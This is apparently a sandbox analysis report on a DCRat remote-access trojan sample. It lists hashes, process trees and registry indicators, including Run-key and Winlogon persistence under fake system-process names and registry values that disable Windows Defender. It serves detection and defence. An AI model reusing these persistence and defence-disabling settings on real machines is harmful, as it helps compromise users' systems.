dcrat | 82e29a0166df43cfe0fd762b8274149e3385606635e977f86d814c6f722be67f

Analysis

max time kernel
40s
max time network
154s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
25-12-2022 23:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmp.exe
Size

15.7MB
MD5

b27e540aef37c99f3cfd2766c2e61784
SHA1

c516b74daec17d1bc788c54433cf10899ee07e92
SHA256

28ebd60f492ca0957ac7ab3fdbcd8262966dee60dbec71d6bcac8d7efaf65479
SHA512

641d5daaef91d535f279ce7fea1f7c8b50ba87040480602e51951dfc2f3345699d3161d38b1b2ab7b3d4fbbcc56e0d597f125ed65ea3971df4888cb4a63897cd
SSDEEP

393216:XhBqJ0CE8/eXkkM7cGGBNpuXU8ysXVqNIyc2KBcr27eEHTPX:RBe0CiMihuXU8yYqNIygdrX

Score

10^/10

dcrat discovery evasion exploit infostealer persistence rat trojan

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Modifies WinLogon for persistence 2 TTPs 16 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

ComdriverSvc.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Program Files\\7-Zip\\explorer.exe\", \"C:\\Windows\\tracing\\winlogon.exe\", \"C:\\Users\\Default\\timeout.exe\", \"C:\\Recovery\\d6223342-1a8a-11ed-b209-a59dca5554ed\\dwm.exe\", \"C:\\Program Files\\Windows Defender\\en-US\\lsass.exe\", \"C:\\runtimeMonitor\\dwm.exe\", \"C:\\Windows\\Installer\\{90140000-002A-0000-1000-0000000FF1CE}\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\timeout.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\dwm.exe\", \"C:\\Recovery\\d6223342-1a8a-11ed-b209-a59dca5554ed\\lsass.exe\", \"C:\\Program Files (x86)\\Windows Sidebar\\es-ES\\Idle.exe\", \"C:\\Recovery\\d6223342-1a8a-11ed-b209-a59dca5554ed\\spoolsv.exe\", \"C:\\runtimeMonitor\\dwm.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Program Files\\7-Zip\\explorer.exe\", \"C:\\Windows\\tracing\\winlogon.exe\", \"C:\\Users\\Default\\timeout.exe\", \"C:\\Recovery\\d6223342-1a8a-11ed-b209-a59dca5554ed\\dwm.exe\", \"C:\\Program Files\\Windows Defender\\en-US\\lsass.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Program Files\\7-Zip\\explorer.exe\", \"C:\\Windows\\tracing\\winlogon.exe\", \"C:\\Users\\Default\\timeout.exe\", \"C:\\Recovery\\d6223342-1a8a-11ed-b209-a59dca5554ed\\dwm.exe\", \"C:\\Program Files\\Windows Defender\\en-US\\lsass.exe\", \"C:\\runtimeMonitor\\dwm.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Program Files\\7-Zip\\explorer.exe\", \"C:\\Windows\\tracing\\winlogon.exe\", \"C:\\Users\\Default\\timeout.exe\", \"C:\\Recovery\\d6223342-1a8a-11ed-b209-a59dca5554ed\\dwm.exe\", \"C:\\Program Files\\Windows Defender\\en-US\\lsass.exe\", \"C:\\runtimeMonitor\\dwm.exe\", \"C:\\Windows\\Installer\\{90140000-002A-0000-1000-0000000FF1CE}\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\timeout.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\dwm.exe\", \"C:\\Recovery\\d6223342-1a8a-11ed-b209-a59dca5554ed\\lsass.exe\", \"C:\\Program Files (x86)\\Windows Sidebar\\es-ES\\Idle.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Program Files\\7-Zip\\explorer.exe\", \"C:\\Windows\\tracing\\winlogon.exe\", \"C:\\Users\\Default\\timeout.exe\", \"C:\\Recovery\\d6223342-1a8a-11ed-b209-a59dca5554ed\\dwm.exe\", \"C:\\Program Files\\Windows Defender\\en-US\\lsass.exe\", \"C:\\runtimeMonitor\\dwm.exe\", \"C:\\Windows\\Installer\\{90140000-002A-0000-1000-0000000FF1CE}\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\timeout.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\dwm.exe\", \"C:\\Recovery\\d6223342-1a8a-11ed-b209-a59dca5554ed\\lsass.exe\", \"C:\\Program Files (x86)\\Windows Sidebar\\es-ES\\Idle.exe\", \"C:\\Recovery\\d6223342-1a8a-11ed-b209-a59dca5554ed\\spoolsv.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Program Files\\7-Zip\\explorer.exe\", \"C:\\Windows\\tracing\\winlogon.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Program Files\\7-Zip\\explorer.exe\", \"C:\\Windows\\tracing\\winlogon.exe\", \"C:\\Users\\Default\\timeout.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Program Files\\7-Zip\\explorer.exe\", \"C:\\Windows\\tracing\\winlogon.exe\", \"C:\\Users\\Default\\timeout.exe\", \"C:\\Recovery\\d6223342-1a8a-11ed-b209-a59dca5554ed\\dwm.exe\", \"C:\\Program Files\\Windows Defender\\en-US\\lsass.exe\", \"C:\\runtimeMonitor\\dwm.exe\", \"C:\\Windows\\Installer\\{90140000-002A-0000-1000-0000000FF1CE}\\conhost.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Program Files\\7-Zip\\explorer.exe\", \"C:\\Windows\\tracing\\winlogon.exe\", \"C:\\Users\\Default\\timeout.exe\", \"C:\\Recovery\\d6223342-1a8a-11ed-b209-a59dca5554ed\\dwm.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Program Files\\7-Zip\\explorer.exe\", \"C:\\Windows\\tracing\\winlogon.exe\", \"C:\\Users\\Default\\timeout.exe\", \"C:\\Recovery\\d6223342-1a8a-11ed-b209-a59dca5554ed\\dwm.exe\", \"C:\\Program Files\\Windows Defender\\en-US\\lsass.exe\", \"C:\\runtimeMonitor\\dwm.exe\", \"C:\\Windows\\Installer\\{90140000-002A-0000-1000-0000000FF1CE}\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\timeout.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\dwm.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Program Files\\7-Zip\\explorer.exe\", \"C:\\Windows\\tracing\\winlogon.exe\", \"C:\\Users\\Default\\timeout.exe\", \"C:\\Recovery\\d6223342-1a8a-11ed-b209-a59dca5554ed\\dwm.exe\", \"C:\\Program Files\\Windows Defender\\en-US\\lsass.exe\", \"C:\\runtimeMonitor\\dwm.exe\", \"C:\\Windows\\Installer\\{90140000-002A-0000-1000-0000000FF1CE}\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\timeout.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\dwm.exe\", \"C:\\Recovery\\d6223342-1a8a-11ed-b209-a59dca5554ed\\lsass.exe\", \"C:\\Program Files (x86)\\Windows Sidebar\\es-ES\\Idle.exe\", \"C:\\Recovery\\d6223342-1a8a-11ed-b209-a59dca5554ed\\spoolsv.exe\", \"C:\\runtimeMonitor\\dwm.exe\", \"C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\services.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Program Files\\7-Zip\\explorer.exe\", \"C:\\Windows\\tracing\\winlogon.exe\", \"C:\\Users\\Default\\timeout.exe\", \"C:\\Recovery\\d6223342-1a8a-11ed-b209-a59dca5554ed\\dwm.exe\", \"C:\\Program Files\\Windows Defender\\en-US\\lsass.exe\", \"C:\\runtimeMonitor\\dwm.exe\", \"C:\\Windows\\Installer\\{90140000-002A-0000-1000-0000000FF1CE}\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\timeout.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\dwm.exe\", \"C:\\Recovery\\d6223342-1a8a-11ed-b209-a59dca5554ed\\lsass.exe\", \"C:\\Program Files (x86)\\Windows Sidebar\\es-ES\\Idle.exe\", \"C:\\Recovery\\d6223342-1a8a-11ed-b209-a59dca5554ed\\spoolsv.exe\", \"C:\\runtimeMonitor\\dwm.exe\", \"C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\services.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\lsm.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\System.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Program Files\\7-Zip\\explorer.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Program Files\\7-Zip\\explorer.exe\", \"C:\\Windows\\tracing\\winlogon.exe\", \"C:\\Users\\Default\\timeout.exe\", \"C:\\Recovery\\d6223342-1a8a-11ed-b209-a59dca5554ed\\dwm.exe\", \"C:\\Program Files\\Windows Defender\\en-US\\lsass.exe\", \"C:\\runtimeMonitor\\dwm.exe\", \"C:\\Windows\\Installer\\{90140000-002A-0000-1000-0000000FF1CE}\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\timeout.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Program Files\\7-Zip\\explorer.exe\", \"C:\\Windows\\tracing\\winlogon.exe\", \"C:\\Users\\Default\\timeout.exe\", \"C:\\Recovery\\d6223342-1a8a-11ed-b209-a59dca5554ed\\dwm.exe\", \"C:\\Program Files\\Windows Defender\\en-US\\lsass.exe\", \"C:\\runtimeMonitor\\dwm.exe\", \"C:\\Windows\\Installer\\{90140000-002A-0000-1000-0000000FF1CE}\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\timeout.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\dwm.exe\", \"C:\\Recovery\\d6223342-1a8a-11ed-b209-a59dca5554ed\\lsass.exe\""	ComdriverSvc.exe

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

1.exe1.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "3"	1.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "3"	1.exe

Process spawned unexpected child process 48 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1480	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1728	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1540	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	792	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1716	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	544	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	908	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1812	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1680	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1352	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	764	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1144	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	776	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	360	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	760	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1516	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1164	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1960	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2068	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1460	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2096	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2120	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2140	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2164	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2188	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2208	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2232	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2252	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2272	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2296	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2316	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2356	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2340	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2384	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2404	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2420	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2448	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2472	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2516	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2492	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2556	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2540	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2592	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2616	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2640	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2660	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2684	1572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2708	1572	schtasks.exe

DCRat payload 10 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
\ProgramData\dc.exe	dcrat
C:\ProgramData\dc.exe	dcrat
C:\programdata\dc.exe	dcrat
\ProgramData\dc.exe	dcrat
\ProgramData\dc.exe	dcrat
C:\runtimeMonitor\ComdriverSvc.exe	dcrat
\runtimeMonitor\ComdriverSvc.exe	dcrat
C:\runtimeMonitor\ComdriverSvc.exe	dcrat
\runtimeMonitor\ComdriverSvc.exe	dcrat
behavioral2/memory/1484-129-0x00000000012A0000-0x00000000013AC000-memory.dmp	dcrat

Executes dropped EXE 9 IoCs

Processes:

1.exeany.exedc.exe1.exewsappz.exeComdriverSvc.exeAnyDesk.exeAnyDesk.exeMSTask.exe

pid process

520 1.exe
1084 any.exe
1580 dc.exe
1756 1.exe
1168 wsappz.exe
1484 ComdriverSvc.exe
1536 AnyDesk.exe
604 AnyDesk.exe
1736 MSTask.exe

pid	process
520	1.exe
1084	any.exe
1580	dc.exe
1756	1.exe
1168	wsappz.exe
1484	ComdriverSvc.exe
1536	AnyDesk.exe
604	AnyDesk.exe
1736	MSTask.exe

Possible privilege escalation attempt 11 IoCs

exploit

Processes:

icacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
2632	icacls.exe
1812	takeown.exe
2308	icacls.exe
1884	icacls.exe
2460	icacls.exe
764	icacls.exe
952	icacls.exe
452	icacls.exe
2488	icacls.exe
2552	icacls.exe
1660	icacls.exe

Loads dropped DLL 14 IoCs

Processes:

tmp.execmd.execmd.exewsappz.exe

pid	process
1504	tmp.exe
1504	tmp.exe
1504	tmp.exe
1504	tmp.exe
1504	tmp.exe
1504	tmp.exe
1504	tmp.exe
1504	tmp.exe
1504	tmp.exe
1504	tmp.exe
1844	cmd.exe
1284	cmd.exe
1284	cmd.exe
1168	wsappz.exe

Modifies file permissions 1 TTPs 11 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exe

pid	process
452	icacls.exe
2488	icacls.exe
2552	icacls.exe
1660	icacls.exe
952	icacls.exe
2632	icacls.exe
2308	icacls.exe
1884	icacls.exe
764	icacls.exe
1812	takeown.exe
2460	icacls.exe

Windows security modification 2 TTPs 4 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

1.exe1.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection	1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\DisableAntiSpyware = "1"	1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection	1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	1.exe

Adds Run key to start application 2 TTPs 30 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

ComdriverSvc.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Program Files\\Windows Defender\\en-US\\lsass.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\Installer\\{90140000-002A-0000-1000-0000000FF1CE}\\conhost.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\dwm.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Program Files (x86)\\Windows Sidebar\\es-ES\\Idle.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\System.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\timeout = "\"C:\\Users\\Default\\timeout.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Recovery\\d6223342-1a8a-11ed-b209-a59dca5554ed\\dwm.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Recovery\\d6223342-1a8a-11ed-b209-a59dca5554ed\\spoolsv.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Program Files\\7-Zip\\explorer.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\timeout = "\"C:\\Users\\Default\\timeout.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\runtimeMonitor\\dwm.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Recovery\\d6223342-1a8a-11ed-b209-a59dca5554ed\\lsass.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Program Files (x86)\\Windows Sidebar\\es-ES\\Idle.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\services.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\services.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Windows\\tracing\\winlogon.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Program Files\\7-Zip\\explorer.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\Installer\\{90140000-002A-0000-1000-0000000FF1CE}\\conhost.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\dwm.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\runtimeMonitor\\dwm.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Recovery\\d6223342-1a8a-11ed-b209-a59dca5554ed\\dwm.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Program Files\\Windows Defender\\en-US\\lsass.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\timeout = "\"C:\\Program Files\\Uninstall Information\\timeout.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\timeout = "\"C:\\Program Files\\Uninstall Information\\timeout.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Recovery\\d6223342-1a8a-11ed-b209-a59dca5554ed\\lsass.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\lsm.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Windows\\tracing\\winlogon.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Recovery\\d6223342-1a8a-11ed-b209-a59dca5554ed\\spoolsv.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\lsm.exe\""	ComdriverSvc.exe
